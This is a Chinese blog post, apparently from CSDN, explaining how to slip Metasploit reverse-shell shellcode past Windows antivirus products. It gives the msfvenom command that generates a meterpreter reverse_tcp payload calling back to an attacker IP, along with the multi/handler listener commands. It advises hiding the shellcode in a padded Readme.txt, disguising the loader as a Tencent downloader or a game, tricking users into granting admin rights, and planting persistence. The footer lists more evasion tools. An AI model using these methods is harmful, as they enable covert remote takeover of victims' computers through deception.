kali linux 源码免杀,shellcode超级免杀

最新推荐文章于 2024-07-23 14:38:11 发布
最新推荐文章于 2024-07-23 14:38:11 发布
阅读量1.7k 收藏 24
点赞数
文章标签: kali linux 源码免杀

shellcode超级免杀

作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.

日期: 2019-12-31

我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写好之后,发现虽然shellcode能注入,但是不能免杀,于是采用各种加密技巧,还是没能逃脱火绒,我绞尽脑汁的想,使用dll注入,dll注入虽然能逃脱免杀,payload反弹时,可是不能交互了.我就采用一种更笨的方法,就是程序运行时加载一下shellcode文件,试了一下成功免杀.好废话不多说,咱们开始!!!!

效果图

f269a3c4761b0cadbf090ae5b4e3df09.png

演示:

环境

Kali (攻击机)

Win10 (受害机 且安装有各种杀毒软件)

WinXp (辅助机,只是用来编译源码的)

如何免杀

免杀效果其实很简单,就是程序启动后加载文件动态运行里面写好的shellcode即可.

而且还方便替换shellcode不用编译,直接替换文本文件内容即可,且还可以伪装为Readme.txt文件

可以向Readme.txt乱填入一些声明,将shellcode进行排版,以防被发现..

可以借助一些软件进行编译你的加载器,修改图标即大小,让对方毫无怀疑...

生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c

lhost后面就是我本地的ip, lport后面时指定的一个端口号.指定好之后,会生成shellcode如下图:

aafa8a73080385b73a712dd07afe0fa1.png

将生成的shellcode复制粘贴到一个文件里,你也可以直接使用

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt

那shellcode放在了a.txt文件中了,代开看也更上图一模一样.

写入shellcode:

得到shellcode之后,我先进行操作,涉及到加载器的源码,我会把它放在末尾来说:

使用我已经编译后的一个仿真电脑管家下载器,如图:

3a9b612201606a5cc8758936bc5d486b.png

一个文件是模拟电脑管家下载器的一个软件,是我编译好的一个文件,后面我会讲它的简单原理与制作

另一个 Readme.txt就是我们放置shellcode的文件

我向Readme.txt里写入了一些东西,可以让下载的人这东西只是用来声明的,如图

8278bcf3d353371f0a206c51c47e7b8d.png

使劲回车,然后将自己的shellcode复制到该文件.

6cb46ab06f51b41133b04fbecf3919df.png

这里我把shellcode藏在了该文件的底部,一般人它也只读前面,后面不会看,看到了也不知道那是啥玩意..

复制好之后,想方设法将这两个文件仍到你的目标,有很多方法,就不多说了..

实施攻击:

假如对方已经拿到了,该软件,如图:

2af6c90b32e51219e78965877466cd03.png

从这里可以知道,静态的反杀已经OK,昨天使用的各种加密手段,还是没能逃脱火绒的魔抓,这个方法还可以,看一下Readme.txt

ad62bc0b0f99652d13db06001ef6eaf7.png

往下拉看一下shellcode:

1dd9ef2f557867b3228358a82d8512f9.png

如果觉得shellcode太显眼,你可以对它进行base64加解密就行.

在kali中输入 msfconsole

进入之后如图:

86ca60e5b67d356605e2829373042373.png

依次输入以下命令

#msf5> use exploit/multi/handler

#msf5> set payload windows/meterpreter/reverse_tcp

#msf5> set lhost ip (这里填你的攻击机上的ip)

#msf5> set lport port (这里填生成shellcode时的端口)

#msf5> exploit -j (后台监听)

如图:

c3a31888405cf6b798b88e46b3e6281a.png

当对方点击QQPCDownload运行时即可得到shell.

5a797bdbca4bd1d7bdaab36c8ea20330.png

看到了一个session 开启了输入 session -i 1 (1就是开启号) 进行交互.输入sysinfo

5f6b1a6c5f993f8dbec90ed9914383a2.png

咱们使用火绒来边扫描边控制吧...

ade1428326a1bda69cb893a5020a1960.png

可以看到,完全杀不到.....好了演示结束,接下来就是讲讲加载器咋写吧.

加载器咋写:

根据网络安全法律,不公布

伪装

可以使用,extraicohs工具提取任意一个exe文件的图标,提取之后,在vc6中添加图标进行编译

然后再使用我开发的一个工具调整一下加载器的大小.

15f3d16390d667e5ba0c1e2611b7e8dd.png 我做了几个游戏,游戏里就包含了木马,然对方直接不知道这个有病毒.还有一种方式更加伪装. 分享啥啥源码,比如我做的一个贪吃蛇游戏,若对方得到源码,只要对方编译运行,即可中招.. 为了安全着想,我不分享我做的木马....,但原理我已经说了,十分简单.. 可以提取如图:

48522740f7843f95c20a0b0d977acdb1.png

使用Pe_tools增加大小, 如图:

14b52aad520c3733eb08dc9852915213.png

写入到c盘,若为win10电脑,写入到其他磁盘.

fd670292f90f46b5d57a9caf2fc3342a.png

实现可以控制任意一台中木马的电脑.

买一个服务器,选择debian,然后安装metasploit框架,既可以实现控制任意一台中木马的电脑....

如何获取管理员权限

侵入对方后,看一下他的安全软件,然后使用木马冒充安全软件,在开发木马时,设置一下运行的权限为管理员即可

然后运行该木马,这时就会出现一个管理员权限的请求,一般情况下,用户都很信任安全软件获取管理员权限,则点击是.

然后c盘随你玩了

如何设置后门

要想实现长期控制,就得给对方上传开机自的木马...,我已经做好了,且根据对方的杀毒软件做的一个白加黑.

杀毒软件和使用者毫无察觉,为了不让自己进局子,我不会发给别人..

源码下载 + 测试文件:

实验工具下载: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip

每天开心的进步
关注
绕过AV:免杀shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
kali linux木马免杀工具
边城浪子的博客
08-16 4931
1.Venom Shellcode Generator
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Button12138的博客
07-23 749
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后1、mycclMyccl作为05出品的一款定位工具,到现在还是独领风骚,实用性五星,稳定性五星。2、C32asm一款非常好的静态反汇编工具一般人免杀定位出特征码后都会先到C32里面去改,如果不行就载入od。当然,源码免杀就直接看定位出的东西在源码所对应的代码修改就ok。3、OD作为一款神器,OD有很多作用,破解,免杀啊,都需要它,做免杀不必要学汇编,通读几遍80×86就差不多了4、LordPE。
Kali Linux渗透测试——免杀基础
Captain_RB的博客
06-01 2285
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录一、基础概念(一)恶意软件(二)防护手段(三)免杀技术二、工具介绍(一)Msfvenom(二)Veil-evasion(三)Backdoor-factory 一、基础概念 (一)恶意软件 在用户非自愿情况下执行安装,具有控制、窃取、勒索、攻击等恶意功能的软件,基本分类如下: 病毒:独立存在或者插入在计算机程序中的恶意代码,可通过隐蔽复制进行传播 蠕虫:可以通过网络进行传播的病毒 木马:通过伪装诱使用户运行程序,达到远程控制、破.
Kali Linux动态shellcode注入工具:Shellter 4.0 绕过反病毒软件
文山
09-16 3091
http://bobao.360.cn/learning/detail/554.html 用Kali Linux动态shellcode注入工具:Shellter 4.0 绕过反病毒软件 2015-07-24 18:59:32 来源:360安全播报 阅读:2646次 点赞(0) 收藏(1) 分享到: 你是否在为无法通过shell代码
利用kali的msf提取汇编机器码(shellcode
qq_41683305的博客
02-19 956
对于提取小段汇编的机器码,kali的msf提取汇编机器码非常方便 比如提取下面小段的汇编机器码 push 5 ;5=SW_SHOW push eax mov eax,0x755bdab0 call eax 首先输入 msf-nasm_shell //注意msf和-之间没有空格 然后依次输入命令 将上面内容复制到一个文本编辑器里,提取 然后每两个数字之间加入/x \x6...
shellcode 其他 免杀
代码审计
05-18 347
https://blog.csdn.net/qq_36241198/article/details/119846882?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165285461216781432947947%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165285461216781432947947&biz_id=0&
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1253
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 2741
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1236
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
linux卸载veil,Kali Linux下Veil安装与使用的方法
weixin_32571169的博客
05-08 966
Veil是一款绕过杀毒软件的payload生成器,今天我将给大家分享如何安装,安装方法有以下几种,一、通过建立目录 从Git下载源码安装,sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil-Evasion.gitcd veil-Evasion/bash setup/setup.sh –s源码下载完成...
免杀源代码
10-03
过360提示 主程序免杀源代码
源码免杀webshell
05-04
源码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
APT级全面免杀与企业纵深防御体系的红蓝对抗
悦分享
08-03 699
本文通过模拟APT演示了高级威胁的全面免杀能力,并站在防御者角度思考如何发现、检测和防御高级威胁攻击,从而了解到攻防的对抗性,体会了企业建设纵深防御体系的重要性。
木马源代码免杀处理
p123456789p的专栏
03-17 1525
木马源代码免杀处理  ------------------------------------------有加这样免杀的:------------------------------------------begin  asm  //直接用汇编调用代码进行免杀处理源代码  call testend;Procedure test;asmnopnopnope
技术分享 | go语言源码免杀MSF木马
Uguardsec的博客
07-26 1537
木马源码免杀两种形式:下载者和加载者 https://www.freebuf.com/articles/system/227468.html 前言 加载者的免杀分为两部分: 加载器本身的免杀,加载器源码因为在网上发布许久。特征码已被查杀。 msf本身的shllcode免杀。需要对msf马进行多次混淆编码。 加载器免杀 这里我不放shellcode,看看网上加载器的特征会被多少AV识别。 在微步的VT 0/25 virustotal的VT 15/71 免杀的过了火绒,但是没过360。 接下来从源码
kali 如何编写shell_我的shellcode编写之路 |MSF| Shellcode | kali linux 2017
weixin_39681486的博客
12-22 711
1.我有一个大胆的想法其实shellcode的这篇的灵感也是在与和车王两人的沟通,在他的带领下 也是才知道https://www.exploit-db.com/?原来也有shellcode的一篇新的视角,也是在第二天的时间,也是偷偷的趁着上班的空余时间 研究了一下,上帝第一视角。也是蛮有意思的事情。在shellcode中包含了很多平台的shellcode。2.无心插柳柳成荫3.shellcode ...
kali 如何编写shell_我的shellcode编写之路|MSF|Shellcode|kali linux 2017_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....
weixin_39606911的博客
12-22 293
本帖最后由 Demon123 于 2017-9-20 15:15 编辑install-openvas-for-broad-vulnerability-assessment.1280x600.jpg (84.8 KB, 下载次数: 40)2017-9-20 15:10 上传http://www.secist.com/archives/4809.html1.我有一个大胆的想法其实shellcode的这...
Python木马分离免杀(下载分离型)
lunito的博客
04-27 1033
msf生成python的shellcode木马简单分离免杀思路
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值